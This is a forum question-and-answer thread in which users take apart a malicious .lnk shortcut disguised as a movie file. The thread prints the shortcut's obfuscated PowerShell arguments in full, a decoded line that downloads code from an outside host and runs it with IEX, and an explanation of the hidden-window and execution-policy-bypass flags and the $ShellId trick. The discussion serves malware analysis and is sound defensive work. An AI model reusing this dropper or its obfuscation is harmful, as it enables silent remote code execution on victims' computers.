Malware Using .Lnk file to Powershell

2019-07-09 01:05发布

站内问答 / 前沿技术
764 2 4

I downloaded a file which I almost didn't think twice over, but the target (of the shortcut) caught my eye:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP  . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]

There's no doubt that something fishy is going on here. I understand the first three parameters, but what I couldn't quite figure out is how code of a payload like this would work in just a basic shortcut?

2条回答
Rolldiameter
2楼-- · 2019-07-09 01:12

I got the same. The file looked like a AVI and I opened it quickly to check the quality of the movie. It was actually a well-disguised shortcut: 

PS C:\Users\pharg\Downloads\tv> $sh = New-Object -COM WScript.Shell
PS C:\Users\pharg\Downloads\tv> $target = $sh.CreateShortcut('C:\Users\pharg\Downloads\tv\A Simple Favor 2018.DVDRip720p
.XviD.AC3-EcHO.avi.lnk')
PS C:\Users\pharg\Downloads\tv> $target

FullName         : C:\Users\pharg\Downloads\tv\A Simple Favor 2018.DVDRip720p.XviD.AC3-EcHO.avi.lnk
Arguments        : -NoPr -WINd 1 -eXEc ByP  . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115,
                   112 , 120,32 ,61,32 ,40 ,40, 78, 101 , 119, 45,79 , 98, 106,101,99, 116 , 32 ,83, 121 , 115,116,
                   101 ,109,46 ,78 , 101, 116, 46,87 ,101,98 , 67 ,108,105,101,110 ,116,41, 41 , 46, 68,
                   111,119,110,108, 111 , 97 , 100, 83,116, 114 ,105 ,110,103,40, 39 , 104, 116 ,116,112 ,58,47, 47
                   ,122, 118 , 98 ,46,117, 115 ,47,49 ,39 ,41, 59 ,73 , 69 , 88, 32 ,36, 97, 115 ,112 , 120 ) ) )
Description      : .avi
Hotkey           :
IconLocation     : C:\WINDOWS\System32\imageres.dll,18
RelativePath     :
TargetPath       : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WindowStyle      : 7
WorkingDirectory : %SYSTEMROOT%\System32\WindowsPowerShell\v1.0

The target here translates to:

$aspx = ((New-Object System.Net.WebClient)).DownloadString('http://zvb.us/1');IEX $aspx

I opened http://zvb.us/1 and it seems I have had some code run on my PC. At this point, I am not sure what has happened. No symptoms...

查看更多
0人赞 添加讨论(0) 举报
地球回转人心会变
3楼-- · 2019-07-09 01:37

My guess, it runs a Powershell with

  • NoProfile
  • WindowStyle 1 = Minimized
  • ExecutionPolicy ByPass = Nothing is blocked and there are no warnings or prompts
  • then dot-sources the remaining code

Let's split this code up:

( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]

$ShellId is a built-in Powershell variable:

  >$ShellId
  Microsoft.PowerShell

So ( $shelliD[1]+$SHeLlID[13]+'x') transforms to iex (= Invoke-Expression)

The rest of the code is ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]. I gues the char array contains ascii characters. If so, we can transform it to:

$aspx =

Summary:

powershell.exe -NoProfile -WindowStyle 1 -ExecutionPolicy ByPass . iex "$aspx = ...."

So it invokes the code starting with $aspx = in a minimized Powershell window without warnings or prompts.

Maybe the code ran through one of these obfuscation methods.

Hope that helps.

查看更多
0人赞 添加讨论(0) 举报
登录 后发表回答
相关问题
查看全部
相关文章
查看全部
收藏的人(4)